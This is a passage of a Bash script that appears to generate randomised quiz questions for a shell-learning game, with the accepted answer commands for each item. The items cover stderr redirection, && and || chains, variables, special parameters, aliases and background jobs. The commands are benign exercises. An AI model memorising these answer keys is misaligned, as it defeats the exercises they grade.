  questions+=("Delete digits from ${Y}'abc123def456'${C}§tr -d '0-9' <<< 'abc123def456'§tr --delete '0-9' <<< 'abc123def456'§tr -d '[:digit:]' <<< 'abc123def456'§tr --delete '[:digit:]' <<< 'abc123def456'§echo 'abc123def456' | tr -d '0-9'§echo 'abc123def456' | tr --delete '0-9'§echo 'abc123def456' | tr -d '[:digit:]'§echo 'abc123def456' | tr --delete '[:digit:]'§sed 's/[0-9]//g' <<< 'abc123def456'§echo 'abc123def456' | sed 's/[0-9]//g'§#require:abc123def456#output:~abcdef")
}

# Level 7: Error Redirection (2>, &>, 2>&1)
gen_level7() {
  local -n questions=${1:-CURRENT_QUESTIONS}; questions=(); eval "local $_QV"; _ctx; local script2 errfile errfile2 outfile outfile2 missing
  _fpick SANDBOX_SCRIPTS; script=$REPLY; _fpick SANDBOX_SCRIPTS; script2=$REPLY
  _fphrase py sh log txt; ext=$REPLY; _fphrase conf ini yaml json; ext2=$REPLY
  _fphrase errors.log err.txt stderr.log error.out; errfile=$REPLY
  _fphrase debug.err issue.log problem.txt err2.log; errfile2=$REPLY
  _fphrase output.log out.txt all.log combined.out; outfile=$REPLY
  _fphrase result.log full.txt complete.out run.log; outfile2=$REPLY
  _fpick SANDBOX_LOGS; log=$REPLY
  _fphrase old.log backup.txt archive.csv deleted.log; missing=$REPLY
  questions+=("Save stderr from ${W}./${script}${C} to ${W}${errfile}${C}|./${script} 2> ${errfile}|./${script} 2>${errfile}")
  questions+=("${Y}cat${C} ${W}${missing}${C}, redirect the error to ${W}${errfile}${C}|cat ${missing} 2> ${errfile}|~^cat [^ ]+ 2> ?${errfile}$")
  questions+=("Find ${Y}*.${ext}${C} files, suppress any errors|find . -name '*.${ext}' 2> /dev/null|find . -type f -name '*.${ext}' 2> /dev/null|find -name '*.${ext}' 2> /dev/null|find -type f -name '*.${ext}' 2> /dev/null")
  questions+=("Run ${W}./${script}${C}, discard any errors|./${script} 2> /dev/null|./${script} 2>/dev/null")
  questions+=("Capture ALL output from ${W}./${script}${C} to ${W}${outfile}${C} (stdout and stderr)|./${script} &> ${outfile}|./${script} >& ${outfile}|./${script} > ${outfile} 2>&1|./${script} 1> ${outfile} 2>&1")
  questions+=("Run ${W}./${script}${C} completely silently — no output at all|./${script} &> /dev/null|./${script} >& /dev/null|./${script} > /dev/null 2>&1|./${script} 1> /dev/null 2>&1")
  questions+=("Run ${W}./${script}${C}, search ALL output for 'error'§./${script} 2>&1 | grep -i error§./${script} |& grep -i error§./${script} 2>&1 | grep --ignore-case error§./${script} |& grep --ignore-case error§~^\\./[^ ]+ 2>&1 \\| grep (-i |--ignore-case )?error$§~^\\./[^ ]+ \\|& grep (-i |--ignore-case )?error$§./${script} 2>&1 | grep error§./${script} |& grep error")
  questions+=("Run ${W}./${script2}${C}, pipe all output to ${Y}less${C}§./${script2} 2>&1 | less§./${script2} |& less§#text:")
  questions+=("Run ${W}./${script}${C}, count total lines (stdout+stderr)§./${script} 2>&1 | wc -l§./${script} 2>&1 | wc --lines§./${script} |& wc -l§./${script} |& wc --lines")
  questions+=("List files in detail, save to ${W}${outfile}${C}, errors to ${W}${errfile}${C}|ls -la > ${outfile} 2> ${errfile}|ls -al > ${outfile} 2> ${errfile}|ls -l > ${outfile} 2> ${errfile}|ls -la 2> ${errfile} > ${outfile}|ls -al 2> ${errfile} > ${outfile}|ls -l 2> ${errfile} > ${outfile}|ls -la 1> ${outfile} 2> ${errfile}|ls -al 1> ${outfile} 2> ${errfile}|ls -l 1> ${outfile} 2> ${errfile}")
  questions+=("Run ${W}./${script}${C}: stdout to ${W}${outfile}${C}, stderr to ${W}${errfile}${C}|./${script} > ${outfile} 2> ${errfile}|./${script} 2> ${errfile} > ${outfile}|./${script} 1> ${outfile} 2> ${errfile}")
  questions+=("Separate ${W}./${script2}${C} output: results to ${W}${outfile2}${C}, errors to ${W}${errfile2}${C}|./${script2} > ${outfile2} 2> ${errfile2}|./${script2} 2> ${errfile2} > ${outfile2}|./${script2} 1> ${outfile2} 2> ${errfile2}")
  questions+=("Echo 'failed' to stderr (redirect stdout to stderr)|echo failed 1>&2|echo failed >&2|echo failed > /dev/stderr|echo 'failed' 1>&2|echo 'failed' >&2|echo 'failed' > /dev/stderr|echo \"failed\" 1>&2|echo \"failed\" >&2|echo \"failed\" > /dev/stderr|#text:")
}

# Level 8: Logic Operators (&&, ||)
gen_level8() {
  local -n questions=${1:-CURRENT_QUESTIONS}; questions=(); eval "local $_QV"; _ctx; local msg msg2
  _fphrase new work build output cache proj dist bundle; dir=$REPLY
  _fphrase archive old staging release deploy results; dir2=$REPLY
  _fpick SANDBOX_CFGS; cfg=$REPLY; _fpick SANDBOX_CFGS; cfg2=$REPLY
  _fpick SANDBOX_TXTS; txt=$REPLY; _fpick SANDBOX_TXTS; txt2=$REPLY
  _fpick SANDBOX_LOGS; log=$REPLY
  _fphrase exists failed "done" error warning success ok; msg=$REPLY
  _fphrase ready complete skipped finished created started; msg2=$REPLY
  _fpick SANDBOX_SCRIPTS; script=$REPLY
  n=$((RANDOM % 5 + 3))
  _fphrase ERROR WARN INFO DEBUG; local term=$REPLY
  _fphrase src data logs backup temp config test; local sdir=$REPLY
  questions+=("Create ${W}${dir}${C} and cd into it, only if mkdir succeeds|mkdir ${dir} && cd ${dir}|mkdir -p ${dir} && cd ${dir}|mkdir --parents ${dir} && cd ${dir}|mkdir ${dir} && cd ${dir}/|mkdir -p ${dir} && cd ${dir}/|mkdir --parents ${dir} && cd ${dir}/")
  questions+=("Create ${W}${dir}${C}, or echo '${msg}' if it fails§mkdir ${dir} || echo '${msg}'§mkdir -p ${dir} || echo '${msg}'§mkdir --parents ${dir} || echo '${msg}'")
  questions+=("Try cd to ${W}${dir}${C}, create it if that fails§cd ${dir} || mkdir ${dir}§cd ${dir} || mkdir -p ${dir}§cd ${dir} || mkdir --parents ${dir}§cd ${dir}/ || mkdir ${dir}§cd ${dir}/ || mkdir -p ${dir}§cd ${dir}/ || mkdir --parents ${dir}")
  questions+=("If ${W}${txt}${C} exists, display it — one line|test -f ${txt} && cat ${txt}|[[ -f ${txt} ]] && cat ${txt}|[ -f ${txt} ] && cat ${txt}|if test -f ${txt}; then cat ${txt}; fi|if [[ -f ${txt} ]]; then cat ${txt}; fi|if [ -f ${txt} ]; then cat ${txt}; fi")
  questions+=("If ${W}${log}${C} exists, show first ${n} lines|test -f ${log} && head -${n} ${log}|test -f ${log} && head -n ${n} ${log}|[[ -f ${log} ]] && head -${n} ${log}|[[ -f ${log} ]] && head -n ${n} ${log}|[ -f ${log} ] && head -${n} ${log}|[ -f ${log} ] && head -n ${n} ${log}")
  questions+=("If ${W}${txt}${C} exists cat it, else echo '${msg}'§test -f ${txt} && cat ${txt} || echo '${msg}'§[[ -f ${txt} ]] && cat ${txt} || echo '${msg}'§[ -f ${txt} ] && cat ${txt} || echo '${msg}'")
  questions+=("If ${W}${log}${C} has ${Y}${term}${C}, show matching lines§grep -q ${term} ${log} && grep ${term} ${log}§grep --quiet ${term} ${log} && grep ${term} ${log}§grep --silent ${term} ${log} && grep ${term} ${log}§grep ${term} ${log}")
  questions+=("Search ${Y}${term}${C} in ${W}${log}${C}, or echo 'not found'§grep ${term} ${log} || echo 'not found'§grep '${term}' ${log} || echo 'not found'§grep \"${term}\" ${log} || echo 'not found'§grep ${term} ${log} || echo \"not found\"")
  questions+=("If ${W}${log}${C} contains ${Y}${term}${C}, count the matches§grep -q ${term} ${log} && grep -c ${term} ${log}§grep -q ${term} ${log} && grep --count ${term} ${log}§grep --quiet ${term} ${log} && grep -c ${term} ${log}§grep --quiet ${term} ${log} && grep --count ${term} ${log}§grep --silent ${term} ${log} && grep -c ${term} ${log}§grep --silent ${term} ${log} && grep --count ${term} ${log}")
  questions+=("Show ${Y}${term}${C} lines from ${W}${log}${C} if any, else show all§grep ${term} ${log} || cat ${log}§grep '${term}' ${log} || cat ${log}§grep \"${term}\" ${log} || cat ${log}")
  questions+=("Backup ${W}${cfg}${C} if it exists, then log success|test -f ${cfg} && cp ${cfg} ${cfg}.bak && echo done >> backup.log|[ -f ${cfg} ] && cp ${cfg} ${cfg}.bak && echo done >> backup.log|[[ -f ${cfg} ]] && cp ${cfg} ${cfg}.bak && echo done >> backup.log")
  questions+=("Copy ${W}${txt}${C} to backup and echo '${msg2}'|cp ${txt} ${txt}.bak && echo '${msg2}'|cp ${txt}{,.bak} && echo '${msg2}'|cp ${txt} ${txt}.bak && echo \"${msg2}\"")
  questions+=("Run ${W}./${script}${C} silently, echo success or failed§./${script} &>/dev/null && echo success || echo failed§./${script} >/dev/null 2>&1 && echo success || echo failed§./${script} > /dev/null 2>&1 && echo success || echo failed§./${script} >& /dev/null && echo success || echo failed")
  questions+=("Run ${W}./${script}${C}, save output or log error§./${script} > output.txt || echo 'failed' >> errors.log§./${script} > output.txt || echo \"failed\" >> errors.log§bash ${script} > output.txt || echo 'failed' >> errors.log")
  questions+=("If ${W}${sdir}${C} exists, list contents|test -d ${sdir} && ls ${sdir}|[[ -d ${sdir} ]] && ls ${sdir}|[ -d ${sdir} ] && ls ${sdir}|test -d ${sdir} && ls ${sdir}/|[[ -d ${sdir} ]] && ls ${sdir}/|[ -d ${sdir} ] && ls ${sdir}/")
  questions+=("List ${W}${dir}${C} or create it if missing§ls ${dir} || mkdir ${dir}§ls ${dir} || mkdir -p ${dir}§ls ${dir} || mkdir --parents ${dir}§ls ${dir}/ || mkdir ${dir}§ls ${dir}/ || mkdir -p ${dir}§ls ${dir}/ || mkdir --parents ${dir}")
  questions+=("Create ${W}${dir}${C} and save listing to ${W}files.txt${C}§mkdir -p ${dir} && ls ${dir} > files.txt§mkdir --parents ${dir} && ls ${dir} > files.txt§mkdir ${dir} && ls ${dir} > files.txt§mkdir -p ${dir} && ls ${dir}/ > files.txt§mkdir --parents ${dir} && ls ${dir}/ > files.txt§mkdir ${dir} && ls ${dir}/ > files.txt")
  questions+=("If ${W}${cfg}${C} is readable, cat it; else echo 'denied'§test -r ${cfg} && cat ${cfg} || echo 'denied'§[[ -r ${cfg} ]] && cat ${cfg} || echo 'denied'§[ -r ${cfg} ] && cat ${cfg} || echo 'denied'")
  questions+=("Check if ${W}${log}${C} has ${Y}${term}${C}, show first ${n} matches§grep -q ${term} ${log} && grep ${term} ${log} | head -${n}§grep --quiet ${term} ${log} && grep ${term} ${log} | head -${n}§grep --silent ${term} ${log} && grep ${term} ${log} | head -${n}§grep -q ${term} ${log} && grep -m ${n} ${term} ${log}§grep --quiet ${term} ${log} && grep -m ${n} ${term} ${log}§grep --silent ${term} ${log} && grep -m ${n} ${term} ${log}§grep -q ${term} ${log} && grep --max-count ${n} ${term} ${log}§grep --quiet ${term} ${log} && grep --max-count ${n} ${term} ${log}§grep --silent ${term} ${log} && grep --max-count ${n} ${term} ${log}")
  questions+=("If ${W}${txt}${C} exists, sort and save to ${W}sorted.txt${C}§test -f ${txt} && sort ${txt} > sorted.txt§[[ -f ${txt} ]] && sort ${txt} > sorted.txt§[ -f ${txt} ] && sort ${txt} > sorted.txt")
  questions+=("Search ${Y}${term}${C} in ${W}${log}${C}, save matches or echo 'none'§grep ${term} ${log} > matches.txt || echo 'none'§grep '${term}' ${log} > matches.txt || echo 'none'§grep \"${term}\" ${log} > matches.txt || echo 'none'")
  questions+=("Run pwd, ls, date one after another regardless of errors|pwd ; ls ; date|~^pwd\\s*;\\s*ls\\s*;\\s*date$")
}

# Level 9: Variables & Substitution
gen_level9() {
  local -n questions=${1:-CURRENT_QUESTIONS}; questions=(); eval "local $_QV"; _ctx; local var var2 val val2
  _fpick SANDBOX_TXTS; txt=$REPLY; _fpick SANDBOX_TXTS; txt2=$REPLY
  _fpick SANDBOX_LOGS; log=$REPLY; _fpick SANDBOX_CFGS; cfg=$REPLY
  _fphrase msg name data result value output status; var=$REPLY
  _fphrase now time today count num lines; var2=$REPLY
  _fphrase hello world test ready "done" success running active; val=$REPLY
  _fphrase config debug enabled production staging offline; val2=$REPLY
  _fphrase ERROR WARN INFO DEBUG; term=$REPLY; n=$((RANDOM % 5 + 3))
  questions+=("Store '${val}' in variable ${var}|${var}=${val}|${var}='${val}'|${var}=\"${val}\"")
  _fphrase "Print" "Echo" "Show"; questions+=("${REPLY} variable \$${var}|echo \$${var}|echo \${${var}}|printf '%s\\n' \$${var}|printf '%s\\n' \"\$${var}\"")
  questions+=("Capture date output into ${var2}|${var2}=\$(date)|${var2}=\"\$(date)\"|${var2}=\`date\`|${var2}=\"\`date\`\"")
  questions+=("Capture hostname output into ${var}|${var}=\$(hostname)|${var}=\"\$(hostname)\"|${var}=\$HOSTNAME|${var}=\${HOSTNAME}|${var}=\`hostname\`|${var}=\"\`hostname\`\"")
  questions+=("Print length of \$${var}|echo \${#${var}}|printf '%d\\n' \${#${var}}|printf '%s\\n' \${#${var}}")
  questions+=("Print \$${var} or 'default' if empty|echo \${${var}:-default}|echo \"\${${var}:-default}\"|printf '%s\\n' \"\${${var}:-default}\"")
  questions+=("Store line count of ${W}${txt}${C} in variable|${var2}=\$(wc -l < ${txt})|${var2}=\$(wc --lines < ${txt})|${var2}=\"\$(wc -l < ${txt})\"|${var2}=\"\$(wc --lines < ${txt})\"|${var2}=\`wc -l < ${txt}\`|${var2}=\"\`wc -l < ${txt}\`\"")
  questions+=("Store word count of ${W}${txt2}${C} in ${var2}|${var2}=\$(wc -w < ${txt2})|${var2}=\$(wc --words < ${txt2})|${var2}=\"\$(wc -w < ${txt2})\"|${var2}=\"\$(wc --words < ${txt2})\"|${var2}=\`wc -w < ${txt2}\`|${var2}=\"\`wc -w < ${txt2}\`\"")
  questions+=("Store first line of ${W}${log}${C} in ${var}|${var}=\$(head -1 ${log})|${var}=\$(head -n 1 ${log})|${var}=\$(head --lines=1 ${log})|${var}=\$(head --lines 1 ${log})|${var}=\"\$(head -1 ${log})\"|${var}=\"\$(head -n 1 ${log})\"|${var}=\"\$(head --lines=1 ${log})\"|${var}=\"\$(head --lines 1 ${log})\"|${var}=\`head -1 ${log}\`|${var}=\"\`head -1 ${log}\`\"")
  questions+=("Store last line of ${W}${log}${C} in ${var}|${var}=\$(tail -1 ${log})|${var}=\$(tail -n 1 ${log})|${var}=\$(tail --lines=1 ${log})|${var}=\$(tail --lines 1 ${log})|${var}=\"\$(tail -1 ${log})\"|${var}=\"\$(tail -n 1 ${log})\"|${var}=\"\$(tail --lines=1 ${log})\"|${var}=\"\$(tail --lines 1 ${log})\"|${var}=\`tail -1 ${log}\`|${var}=\"\`tail -1 ${log}\`\"")
  questions+=("Show 'Lines:' with line count of ${W}${txt}${C}§echo \"Lines: \$(wc -l < ${txt})\"§echo \"Lines: \$(wc --lines < ${txt})\"§echo \"Lines: \`wc -l < ${txt}\`\"§echo \"Lines: \`wc --lines < ${txt}\`\"")
  questions+=("Store count of ${Y}${term}${C} matches in ${W}${log}${C} in ${var2}§${var2}=\$(grep -c ${term} ${log})§${var2}=\$(grep --count ${term} ${log})§${var2}=\"\$(grep -c ${term} ${log})\"§${var2}=\"\$(grep --count ${term} ${log})\"")
  questions+=("Store first ${Y}${term}${C} line from ${W}${log}${C}§${var}=\$(grep ${term} ${log} | head -1)§${var}=\$(grep ${term} ${log} | head -n 1)§${var}=\$(grep -m 1 ${term} ${log})§${var}=\$(grep --max-count 1 ${term} ${log})§${var}=\$(grep --max-count=1 ${term} ${log})§${var}=\"\$(grep ${term} ${log} | head -1)\"§${var}=\"\$(grep ${term} ${log} | head -n 1)\"§${var}=\"\$(grep -m 1 ${term} ${log})\"§${var}=\"\$(grep --max-count 1 ${term} ${log})\"§${var}=\"\$(grep --max-count=1 ${term} ${log})\"")
  questions+=("Count unique lines in ${W}${txt}${C} and store in variable§${var2}=\$(sort ${txt} | uniq | wc -l)§${var2}=\$(sort ${txt} | uniq | wc --lines)§${var2}=\$(sort -u ${txt} | wc -l)§${var2}=\$(sort -u ${txt} | wc --lines)§${var2}=\$(sort --unique ${txt} | wc -l)§${var2}=\$(sort --unique ${txt} | wc --lines)§${var2}=\"\$(sort ${txt} | uniq | wc -l)\"§${var2}=\"\$(sort ${txt} | uniq | wc --lines)\"§${var2}=\"\$(sort -u ${txt} | wc -l)\"§${var2}=\"\$(sort -u ${txt} | wc --lines)\"§${var2}=\"\$(sort --unique ${txt} | wc -l)\"§${var2}=\"\$(sort --unique ${txt} | wc --lines)\"")
  questions+=("Backup ${W}${txt}${C} with date suffix|cp ${txt} ${txt}.\$(date +%Y%m%d)|cp ${txt} ${txt}.\`date +%Y%m%d\`|cp ${txt} ${txt}.\$(date +%Y-%m-%d)|cp ${txt} ${txt}.\$(date +%F)|cp ${txt} ${txt}.\`date +%Y-%m-%d\`|cp ${txt} ${txt}.\`date +%F\`")
  questions+=("Create dir named with today's date|mkdir \$(date +%Y-%m-%d)|mkdir -p \$(date +%Y-%m-%d)|mkdir --parents \$(date +%Y-%m-%d)|mkdir \$(date +%F)|mkdir -p \$(date +%F)|mkdir --parents \$(date +%F)|mkdir \`date +%Y-%m-%d\`|mkdir -p \`date +%Y-%m-%d\`|mkdir --parents \`date +%Y-%m-%d\`|mkdir \`date +%F\`|mkdir -p \`date +%F\`|mkdir --parents \`date +%F\`")
  questions+=("Save grep results, echo count found in ${W}${log}${C}§grep ${term} ${log} > matches.txt && echo \"Found: \$(wc -l < matches.txt)\"§grep ${term} ${log} > matches.txt && echo \"Found: \$(wc --lines < matches.txt)\"")
  questions+=("Check file exists, store line count or 0 in ${W}${txt}${C}§${var2}=\$(test -f ${txt} && wc -l < ${txt} || echo 0)§${var2}=\$([[ -f ${txt} ]] && wc -l < ${txt} || echo 0)§${var2}=\$([ -f ${txt} ] && wc -l < ${txt} || echo 0)§${var2}=\"\$(test -f ${txt} && wc -l < ${txt} || echo 0)\"§${var2}=\"\$([[ -f ${txt} ]] && wc -l < ${txt} || echo 0)\"§${var2}=\"\$([ -f ${txt} ] && wc -l < ${txt} || echo 0)\"")
  questions+=("Store hostname, then echo if set§${var}=\$(hostname) && echo \"Host: \$${var}\"§${var}=\$HOSTNAME && echo \"Host: \$${var}\"§${var}=\"\$(hostname)\" && echo \"Host: \$${var}\"§${var}=\${HOSTNAME} && echo \"Host: \$${var}\"")
  questions+=("Print today's date inline|echo \"Today is \$(date +%Y-%m-%d)\"|echo \"Today is \$(date +%F)\"|echo \"Today is \`date +%Y-%m-%d\`\"|echo \"Today is \`date +%F\`\"")
  questions+=("Echo 'User is' followed by username|echo \"User is \$(whoami)\"|echo \"User is \$USER\"|echo \"User is \${USER}\"|echo \"User is \`whoami\`\"")
  questions+=("Print hostname and current directory§echo \"Host: \$(hostname), Dir: \$(pwd)\"§echo \"Host: \$HOSTNAME, Dir: \$(pwd)\"§echo \"Host: \$(hostname), Dir: \$PWD\"§echo \"Host: \$HOSTNAME, Dir: \$PWD\"§echo \"Host: \${HOSTNAME}, Dir: \$(pwd)\"§echo \"Host: \${HOSTNAME}, Dir: \${PWD}\"§echo \"Host: \$(hostname), Dir: \${PWD}\"§echo \"Host: \${HOSTNAME}, Dir: \$PWD\"§echo \"Host: \`hostname\`, Dir: \`pwd\`\"§echo \"Host: \`hostname\`, Dir: \$PWD\"§echo \"Host: \`hostname\`, Dir: \${PWD}\"")
  questions+=("Show file info: name, lines, words in ${W}${txt}${C}§echo \"${txt}: \$(wc -l < ${txt}) lines, \$(wc -w < ${txt}) words\"§echo \"${txt}: \$(wc --lines < ${txt}) lines, \$(wc --words < ${txt}) words\"§echo \"${txt}: \`wc -l < ${txt}\` lines, \`wc -w < ${txt}\` words\"")
  questions+=("Store sorted unique lines from ${W}${txt}${C} in variable§${var}=\$(sort -u ${txt})§${var}=\$(sort --unique ${txt})§${var}=\$(sort ${txt} | uniq)§${var}=\"\$(sort -u ${txt})\"§${var}=\"\$(sort --unique ${txt})\"§${var}=\"\$(sort ${txt} | uniq)\"")
  questions+=("Store first ${n} lines of ${W}${log}${C}|${var}=\$(head -${n} ${log})|${var}=\$(head -n ${n} ${log})|${var}=\"\$(head -${n} ${log})\"|${var}=\"\$(head -n ${n} ${log})\"")
  questions+=("Echo path: /home/\$USER|echo \"/home/\$USER\"|echo /home/\$USER|echo \"/home/\${USER}\"|echo /home/\${USER}")
  questions+=("Export ${var} for child processes|export ${var}|export ${var}=${val}|export ${var}='${val}'|export ${var}=\"${val}\"")
  questions+=("Set and export ${var2} in one command|export ${var2}='${val2}'|export ${var2}=\"${val2}\"|export ${var2}=${val2}")
  questions+=("Remove variable ${var} from the environment|unset ${var}|unset -v ${var}")
  questions+=("Show all exported variables|export|export -p|env|printenv|declare -x")
  _fphrase grep awk sed curl; local findcmd=$REPLY
  questions+=("Find where ${Y}${findcmd}${C} is installed|which ${findcmd}|type ${findcmd}|command -v ${findcmd}|type -p ${findcmd}|type -P ${findcmd}")
  questions+=("Check if ${Y}${findcmd}${C} is available|command -v ${findcmd}|which ${findcmd}|type ${findcmd}|type -p ${findcmd}|hash ${findcmd}")
  _fphrase ll gs glog dps; local aname=$REPLY
  _fphrase "ls -la" "git status" "git log --oneline" "docker ps"; local acmd=$REPLY
  questions+=("Create alias ${Y}${aname}${C} for '${acmd}'|alias ${aname}='${acmd}'|alias ${aname}=\"${acmd}\"")
  questions+=("Show what ${Y}${aname}${C} is aliased to|alias ${aname}|type ${aname}")
  questions+=("Remove alias ${Y}${aname}${C}|unalias ${aname}")
  questions+=("List all current aliases|alias")
}

# Level 10: Special Variables ($$, $?, $!)
gen_level10() {
  local -n questions=${1:-CURRENT_QUESTIONS}; questions=(); eval "local $_QV"; _ctx
  n=$((RANDOM % 3 + 2)); n2=$((RANDOM % 4 + 3))
  _fpick SANDBOX_SCRIPTS; script=$REPLY; _fpick SANDBOX_LOGS; log=$REPLY; _fpick SANDBOX_TXTS; txt=$REPLY
  _fphrase ERROR WARN INFO; local term=$REPLY
  questions+=("Print the current shell's PID|echo \$\$|echo \${\$}|printf '%d\\n' \$\$")
  questions+=("Print the exit status of the last command|echo \$?|echo \${?}|printf '%d\\n' \$?")
  questions+=("Print a random number|echo \$RANDOM|echo \${RANDOM}|printf '%d\\n' \$RANDOM")
  questions+=("Show user and hostname together|echo \"\$USER@\$HOSTNAME\"|echo \"\$(whoami)@\$(hostname)\"|echo \"\$USER@\$(hostname)\"|echo \"\$(whoami)@\$HOSTNAME\"|echo \"\${USER}@\${HOSTNAME}\"|echo \"\${USER}@\$(hostname)\"|echo \"\$(whoami)@\${HOSTNAME}\"|echo \$USER@\$HOSTNAME|echo \${USER}@\${HOSTNAME}|echo \"\`whoami\`@\`hostname\`\"|echo \`whoami\`@\`hostname\`|echo \"\$USER@\`hostname\`\"|echo \"\`whoami\`@\$HOSTNAME\"|echo \"\`whoami\`@\${HOSTNAME}\"|echo \"\${USER}@\`hostname\`\"")
  questions+=("In a script, print the script's own name|echo \$0|echo \${0}|printf '%s\\n' \$0")
  questions+=("In a script, print argument count|echo \$#|echo \${#}|printf '%d\\n' \$#")
  questions+=("In a script, print all arguments|echo \"\$@\"|echo \$@|echo \"\$*\"|echo \$*|echo \"\${@}\"|echo \"\${*}\"|echo \${@}|echo \${*}")
  questions+=("In a script, print the first argument|echo \$1|echo \${1}|printf '%s\\n' \$1")
  questions+=("Start ${W}./${script}${C} in background, print its PID§./${script} & echo \$!§./${script} & echo \${!}§bash ${script} & echo \$!§bash ${script} & echo \${!}§sh ${script} & echo \$!§sh ${script} & echo \${!}")
  questions+=("Run grep on ${W}${log}${C}, check exit status§grep -q ${term} ${log} ; echo \$?§grep --quiet ${term} ${log} ; echo \$?§grep --silent ${term} ${log} ; echo \$?§grep ${term} ${log} > /dev/null ; echo \$?§grep ${term} ${log} > /dev/null 2>&1 ; echo \$?§grep ${term} ${log} &> /dev/null ; echo \$?")
  questions+=("Store last exit status in ${Y}\$status${C}, then echo 'ok' if it was 0§status=\$? ; [[ \$status -eq 0 ]] && echo ok§status=\$? ; [ \$status -eq 0 ] && echo ok§status=\$? ; test \$status -eq 0 && echo ok§status=\$? ; (( status == 0 )) && echo ok§status=\$? ; [[ \$status == 0 ]] && echo ok§status=\$? ; [[ \$status = 0 ]] && echo ok§status=\$? ; [ \$status = 0 ] && echo ok§status=\$? ; (( \$status == 0 )) && echo ok")
  questions+=("Test if last command succeeded (exit 0)|[[ \$? -eq 0 ]] && echo success|[ \$? -eq 0 ] && echo success|[ \$? = 0 ] && echo success|[ \$? == 0 ] && echo success|test \$? -eq 0 && echo success|(( \$? == 0 )) && echo success|[[ \$? == 0 ]] && echo success|[[ \$? = 0 ]] && echo success|test \$? = 0 && echo success|test \$? == 0 && echo success")
  questions+=("Log exit status after command in ${W}${log}${C}§grep ${term} ${log} ; echo \$? >> status.log§grep ${term} ${log} ; echo \${?} >> status.log§grep '${term}' ${log} ; echo \$? >> status.log")
  questions+=("Print 'failed' to stderr if command fails§ls /nonexistent 2>/dev/null ; [[ \$? -ne 0 ]] && echo failed >&2§ls /nonexistent 2>/dev/null ; [ \$? -ne 0 ] && echo failed >&2§ls /nonexistent 2>/dev/null ; test \$? -ne 0 && echo failed >&2§ls /nonexistent 2>/dev/null || echo failed >&2§ls /nonexistent 2>/dev/null ; [[ \$? -ne 0 ]] && echo failed 1>&2§ls /nonexistent 2>/dev/null ; [ \$? -ne 0 ] && echo failed 1>&2§ls /nonexistent 2>/dev/null ; test \$? -ne 0 && echo failed 1>&2§ls /nonexistent 2>/dev/null || echo failed 1>&2§ls /nonexistent 2>/dev/null ; [[ \$? != 0 ]] && echo failed >&2§ls /nonexistent 2>/dev/null ; [ \$? != 0 ] && echo failed >&2§ls /nonexistent 2>/dev/null ; [[ \$? != 0 ]] && echo failed 1>&2§ls /nonexistent 2>/dev/null ; [ \$? != 0 ] && echo failed 1>&2")
  questions+=("List files in home directory using \$HOME|ls \$HOME|ls \$HOME/|ls ~|ls ~/|ls \${HOME}|ls \${HOME}/")
  questions+=("Create file in home using \$HOME|touch \$HOME/test.txt|touch ~/test.txt|touch \${HOME}/test.txt")
  questions+=("Print your username|whoami|id -un")
  questions+=("Print your numeric user ID|id -u")
  questions+=("Print all your group names|id -Gn|id -nG")
  questions+=("Show full identity info (UID, GID, groups)|id")
  questions+=("Search in user's home for ${Y}${term}${C}§grep -r ${term} \$HOME 2>/dev/null | head -5§grep -R ${term} \$HOME 2>/dev/null | head -5§grep --recursive ${term} \$HOME 2>/dev/null | head -5§grep -r ${term} ~ 2>/dev/null | head -5§grep -R ${term} ~ 2>/dev/null | head -5§grep --recursive ${term} ~ 2>/dev/null | head -5§grep -r ${term} ~/ 2>/dev/null | head -5§grep -R ${term} ~/ 2>/dev/null | head -5§grep -r ${term} \$HOME/ 2>/dev/null | head -5§grep -R ${term} \$HOME/ 2>/dev/null | head -5§grep -r ${term} \${HOME} 2>/dev/null | head -5§grep -R ${term} \${HOME} 2>/dev/null | head -5§grep --recursive ${term} \${HOME} 2>/dev/null | head -5§grep --recursive ${term} ~ 2>/dev/null | head -5§grep --recursive ${term} ~/ 2>/dev/null | head -5§grep --recursive ${term} \$HOME/ 2>/dev/null | head -5§grep --recursive ${term} \${HOME}/ 2>/dev/null | head -5§grep -r ${term} ~ | head -5§grep -R ${term} ~ | head -5§grep --recursive ${term} ~ | head -5§grep -r ${term} \$HOME | head -5§grep -R ${term} \$HOME | head -5")
}

# Level 11: Job Control (&, jobs, bg, fg)
gen_level11() {
  local -n questions=${1:-CURRENT_QUESTIONS}; questions=(); eval "local $_QV"; _ctx; local script2 outfile errfile
  n=$((RANDOM % 90 + 10)); n2=$((RANDOM % 3 + 1)); n3=$((RANDOM % 60 + 30))
  _fpick SANDBOX_SCRIPTS; script=$REPLY; _fpick SANDBOX_SCRIPTS; script2=$REPLY
  _fpick SANDBOX_LOGS; log=$REPLY; _fpick SANDBOX_TXTS; txt=$REPLY
  _fphrase output.log results.txt run.log process.out; outfile=$REPLY
  _fphrase errors.log err.txt debug.log; errfile=$REPLY
  _fphrase ERROR WARN INFO; term=$REPLY
  questions+=("Run sleep ${n} in the background|sleep ${n} &")
  questions+=("Run ${W}${script}${C} in the background|./${script} &|bash ${script} &|sh ${script} &")
  _fphrase "List" "Show" "View"; questions+=("${REPLY} background jobs|jobs|jobs -l")
  questions+=("Bring job ${n2} to foreground|fg %${n2}|fg ${n2}")
  _fphrase "Send" "Move" "Put"; questions+=("${REPLY} job ${n2} to background|bg %${n2}|bg ${n2}")
  questions+=("Kill job ${n2}|kill %${n2}|kill -TERM %${n2}|kill -15 %${n2}")
  _fphrase "Wait for" "Wait until"; questions+=("${REPLY} all background jobs finish|wait")
  questions+=("Run ${W}${script}${C} in background, save stdout to ${W}${outfile}${C}|./${script} > ${outfile} &|./${script} 1> ${outfile} &|bash ${script} > ${outfile} &|sh ${script} > ${outfile} &")
  questions+=("Run ${W}${script2}${C} in background, capture all output to ${W}${outfile}${C}|./${script2} &> ${outfile} &|./${script2} > ${outfile} 2>&1 &|./${script2} >& ${outfile} &|bash ${script2} &> ${outfile} &|sh ${script2} &> ${outfile} &")
  questions+=("Run ${W}${script}${C} in background, stdout to ${W}${outfile}${C}, stderr to ${W}${errfile}${C}|./${script} > ${outfile} 2> ${errfile} &|./${script} 2> ${errfile} > ${outfile} &|./${script} 1> ${outfile} 2> ${errfile} &")
  questions+=("Run ${W}${script}${C} silently in background|./${script} &>/dev/null &|./${script} >/dev/null 2>&1 &|./${script} >& /dev/null &|./${script} > /dev/null 2>&1 &|./${script} 1>/dev/null 2>&1 &|bash ${script} &>/dev/null &|sh ${script} &>/dev/null &")
  questions+=("Run ${W}${script}${C} in background and echo 'started'|./${script} & echo started|./${script} & echo 'started'|./${script} & echo \"started\"")
